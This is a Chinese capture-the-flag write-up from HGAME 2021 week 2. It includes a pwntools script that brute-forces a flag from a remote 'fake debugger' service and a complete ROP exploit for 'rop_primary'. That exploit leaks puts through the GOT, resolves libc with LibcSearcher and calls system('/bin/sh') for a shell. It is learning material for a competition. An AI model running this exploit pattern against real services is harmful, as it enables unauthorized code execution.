HGAME-WEEK2-WP
RE
fake_debugger beta
没搞懂编码规律:同一个字符在不同位置对应的编码都不同,没什么思路,于是写了个脚本逐位爆破。
#!/usr/bin/env python
# coding=utf-8
from pwn import *
#context(log_level = 'debug')
# Candidate alphabet for the per-position brute force: every printable ASCII
# character except space (94 in all), tried in this order - digits first
# (with '0' last), then lower case, upper case and punctuation. Order matters
# only when two candidates yield the same code (the later one wins).
total_char = (
    '1234567890'
    'abcdefghijklmnopqrstuvwxyz'
    'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
    '-_=+|/?.>,<:;\"\'\\`~!@#$%^&*(){}[]'
)
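def test(flag_now):
    """Submit ``flag_now`` to the remote fake debugger and return the ``eax``
    value from the register dump printed after stepping.

    The service asks for input after a line ending in ``now!``, then prints a
    register dump per single-step prompt (``---``). This sends
    ``2 * len(flag_now)`` steps (why two per input character is not
    documented here - TODO confirm against the binary) and parses the first
    ``eax:`` line that follows.

    Args:
        flag_now: candidate flag prefix (str), including the character being
            probed as its last element.

    Returns:
        int: the ``eax`` value reported by the service.

    Raises:
        Whatever pwntools raises on connect/EOF/timeout. The connection is
        closed in every case, so a probe that dies mid-protocol does not leak
        a socket (the original only closed on the success path).
    """
    sh = remote("101.132.177.131", 9999)
    try:
        sh.sendlineafter("now!\n", flag_now)
        # One single-step per prompt; the loop index itself is unused.
        for _ in range(2 * len(flag_now)):
            sh.sendlineafter("---\n", ' ')
        sh.recvuntil('eax: ')
        # int() tolerates the trailing newline recvuntil leaves on the line.
        return int(sh.recvuntil("\n"))
    finally:
        sh.close()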
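def get_next(flag_now):
    """Ask the remote fake debugger which code it expects at the next position.

    Sends ``flag_now`` plus one dummy character (``'a'``) so the program runs
    one position past the known prefix, single-steps
    ``2 * len(flag_now) + 2`` times (two more than ``test`` uses for the same
    prefix - the reason is not documented here, TODO confirm against the
    binary) and returns the ``ebx`` value from the register dump. The caller
    looks that value up among the ``eax`` codes collected by ``test``.

    Args:
        flag_now: known flag prefix (str).

    Returns:
        int: the ``ebx`` value reported by the service.

    Raises:
        Whatever pwntools raises on connect/EOF/timeout. The connection is
        always closed; the original never closed it, leaking one socket per
        recovered character.
    """
    sh = remote("101.132.177.131", 9999)
    try:
        sh.sendlineafter("now!\n", flag_now + 'a')
        for _ in range(2 * len(flag_now) + 2):
            sh.sendlineafter("---\n", ' ')
        sh.recvuntil('ebx: ')
        return int(sh.recvuntil("\n"))
    finally:
        sh.close()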
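# Recover the flag one character at a time. The prefix is resumed from earlier
# runs (the write-up notes the brute force was done in several sessions).
flag = 'hgame{You_Kn0w_debuG'
while flag[-1] != '}':
    # For the current position, probe every candidate character and record
    # the eax code the debugger reports for it.
    mapping = {}
    for charac in total_char:
        code = test(flag + charac)
        if code in mapping:
            # Two candidates collide on the same code. The original silently
            # kept the later one; keep that behaviour but make it visible,
            # since a collision means the recovered character is ambiguous.
            print("collision at position %d: %r and %r both give %d"
                  % (len(flag), mapping[code], charac, code))
        mapping[code] = charac
    # The service reports (in ebx) the code it expects at this position;
    # pick the character that produced it.
    expected = get_next(flag)
    if expected not in mapping:
        # The original died here with a bare KeyError; say what happened.
        raise RuntimeError("no candidate in total_char produces code %d at position %d"
                           % (expected, len(flag)))
    flag += mapping[expected]
    print(flag)
print(flag)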
分了几次爆破,所以这个脚本的起点(flag 的初始值)就几乎是完整的 flag 了。

HGAME2021-WEEK2-PWN-WP
rop_primary
没什么难度,就是单纯的 ROP
#!/usr/bin/env python
# coding=utf-8
from pwn import *
from LibcSearcher import *
import re
# Target binary; the GOT/PLT lookups for puts below come from it.
elf = ELF("./rop_primary")

# ROP gadgets, used as absolute addresses (so the binary is presumably
# non-PIE - confirm with checksec). The three addresses overlap inside the
# same few instruction bytes, which is what the tail of __libc_csu_init
# usually looks like; verify with ROPgadget before reusing them elsewhere.
pop_r14_r15_ret = 0x401610   # pop r14; pop r15; ret
pop_rsi_r15_ret = 0x401611   # pop rsi; pop r15; ret
pop_rdi_ret = 0x401613       # pop rdi; ret
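def matrixMul(A, B):
    """Multiply two matrices given as nested lists and return the product.

    Every element is passed through ``int()`` before multiplying, so the
    operands may hold ints or integer strings (the caller feeds it the
    numeric strings pulled out of the service's text). A string such as
    ``'1.5'`` makes ``int()`` raise ``ValueError``.

    Args:
        A: left operand, ``len(A)`` rows of ``len(A[0])`` entries.
        B: right operand, ``len(B)`` rows of ``len(B[0])`` entries.

    Returns:
        list[list[int]]: ``A x B`` with ``len(A)`` rows and ``len(B[0])``
        columns.

    Raises:
        ValueError: if either operand is empty or the inner dimensions differ
            (``len(A[0]) != len(B)``). The original silently returned ``None``
            on a dimension mismatch, which only surfaced later as a TypeError
            when the result was iterated.
    """
    if not A or not B:
        raise ValueError("matrixMul: empty operand")
    if len(A[0]) != len(B):
        raise ValueError("matrixMul: inner dimensions differ (%d vs %d)"
                         % (len(A[0]), len(B)))
    # Convert once up front and transpose B so every output cell is a plain
    # dot product of two sequences.
    rows = [[int(x) for x in row] for row in A]
    cols = [[int(x) for x in col] for col in zip(*B)]
    return [[sum(a * b for a, b in zip(row, col)) for col in cols] for row in rows]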
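def _recv_matrix(sh, sentinel):
    """Read rows of numbers from ``sh`` until a line equal to ``sentinel``.

    Each line is split with the same digit regex the original used, so the
    rows hold numeric *strings*; ``matrixMul`` converts them. Replaces the two
    copy-pasted ``while 1`` loops of the original.

    NOTE(review): the equality test assumes Python 2 pwntools, where
    ``recvuntil`` returns ``str``. Under Python 3 it returns ``bytes``, the
    sentinel never matches and this loops until EOF - the whole script is
    Python 2 (``print`` statements, ``str`` payloads).
    """
    rows = []
    while 1:
        line = sh.recvuntil("\n", drop=True)
        if line == sentinel:
            return rows
        rows.append(re.findall(r"\d+\.?\d*", line))


sh = remote("159.75.104.107", 30372)

# Stage 1: the service gates the bug behind a matrix-product quiz.
sh.recvuntil("A:\n")
matA = _recv_matrix(sh, 'B:')
matB = _recv_matrix(sh, 'a * b = ?')
matAns = matrixMul(matA, matB)
print(matAns)
for row in matAns:
    for cell in row:
        sh.sendline(str(cell))

# Stage 2: leak puts@libc. 0x30 bytes of buffer plus 8 of saved rbp sit before
# the return address (offsets are the original exploit's; confirm in gdb).
# 0x40157B is presumably the start of the vulnerable read, so the program
# accepts a second payload after printing the leak - TODO confirm in the
# disassembly.
sh.recvuntil("best\n")
payload = 'a' * 0x30 + 'b' * 8
payload += p64(pop_rdi_ret) + p64(elf.got['puts']) + p64(elf.symbols["puts"]) + p64(0x40157B)
sh.sendline(payload)
# recvn(6) blocks until all six address bytes arrive; the original recv(6)
# could legally return a short read and silently yield a wrong address.
leak_addr = u64(sh.recvn(6).ljust(8, '\x00'))
log.success("addr:" + hex(leak_addr))

# LibcSearcher matches on a single symbol and may offer several candidate
# libcs (the write-up notes an outdated libc-database found none at all). If
# the shell fails, leak a second symbol to disambiguate.
libc = LibcSearcher('puts', leak_addr)
libc_base = leak_addr - libc.dump("puts")
log.success("libc_base:" + hex(libc_base))
system_addr = libc_base + libc.dump("system")
bin_sh_addr = libc_base + libc.dump('str_bin_sh')

# Stage 3: system("/bin/sh"). The pop r14/r15 gadget with two zero qwords is a
# 24-byte filler: it shifts rsp by an odd number of qwords before system() is
# entered, presumably to satisfy the 16-byte stack alignment its SSE code
# expects. A lone `ret` gadget would have the same effect.
payload = 'a' * 0x30 + 'b' * 8 + p64(pop_r14_r15_ret) + p64(0) * 2
payload += p64(pop_rdi_ret) + p64(bin_sh_addr) + p64(system_addr)
sh.sendlineafter('best\n', payload)
sh.interactive()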
写完exp打远程的时候发现搜不出来 libc,考虑是 libc-database 版本过低,然后尝试更新,但是 libc-database 本身是装 LibcSearcher 的时候一起装的,可能安装的时候有点问题,get 脚本用不来,所以只好整个 libc-database 删掉重装,重新 get,家里的带宽确实比较小,整个更新大概花了半个多小时,再加上更新的时候干别的事情去了差点把这题忘了,所以很晚才打通,但是运气还算不错,抢到了一血,只比二血早了30秒
…
关于/proc目录
`/proc` 这个目录很有用,充满了信息。
`/proc` 应该说是 Linux「一切皆文件」设计哲学的体现:其中的文件和目录本身都属于一个虚拟文件系统,提供了一些内核信息。里面的有些文件很有用处,这里简单列举一下。